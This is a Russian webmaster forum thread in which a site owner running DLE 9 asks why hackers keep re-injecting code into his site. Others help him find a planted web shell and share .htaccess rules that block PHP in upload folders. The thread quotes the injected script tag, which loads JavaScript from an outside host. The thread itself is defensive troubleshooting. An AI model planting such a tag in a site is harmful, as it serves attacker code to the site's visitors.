- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы
Для интернет-магазина инженерных систем
Мария Лосева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Какой раз уже удаляю код, но они снова взламывают
<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://under-click.net/js/if.php?id=7778"></script>
это скрипт который прописали на сайте
стоит Dle 9 (лицензия) , где может быть дыра?
Если версия последняя, возможно, залили шелл. Возможно, увели пароли от фтп.
[umka] пароль от всего я менял
Boris9900 добавил 20.11.2010 в 12:37
[umka] правда это началось когда стояла dle 8.5 nulled из-за этого купил лицензию и всё снес и думал будет всё нормально , а они всё равно ломают..
Сайт на какой оси стоит?
webrock как вас понимать?
webrock как вас понимать?
unix, windows?
потер 10 раз
Если на unix то проверяйте директории tmp и им подобные, имхо, залит шелл...
после обнаружения шелла, а обычно это пэрловский файл, удаляйте, закрывайте с помощью htaccess.
короче нашёл вирус в файле foto_156982.php
там нашёл Web Shell
Защита папок скрипта от запуска сторонних скриптов
вам необходимо разместить в папках /uploads/ и /templates/ файл .htaccess со следующим содержимым:
Данная строчка отключает использование PHP интерпретатора при попытке обращения к PHP файлам находящимся в этих папках, а также находящимся во всех вложенных папках. Поэтому даже в случае заливки в эти папки файлов со зловредным PHP кодом, они становятся для злоумышленника совершенно бесполезными, т.к. попросту не будут запускаться и выполнятся сервером.
К сожалению далеко не все хостинг провайдеры позволяют управлять через .htaccess данным параметром, но для таких сайтов решение также существует, поэтому если на вашем сервере не работает вышеуказанный способ, то разместите в этих же папках .htaccess с содержимым:
Order allow,deny
Deny from all
</FilesMatch>
Данный код запрещает прямое обращение к PHP файлам, находящимся в этих папках.
jamaster да спасибо я это уже сделал)_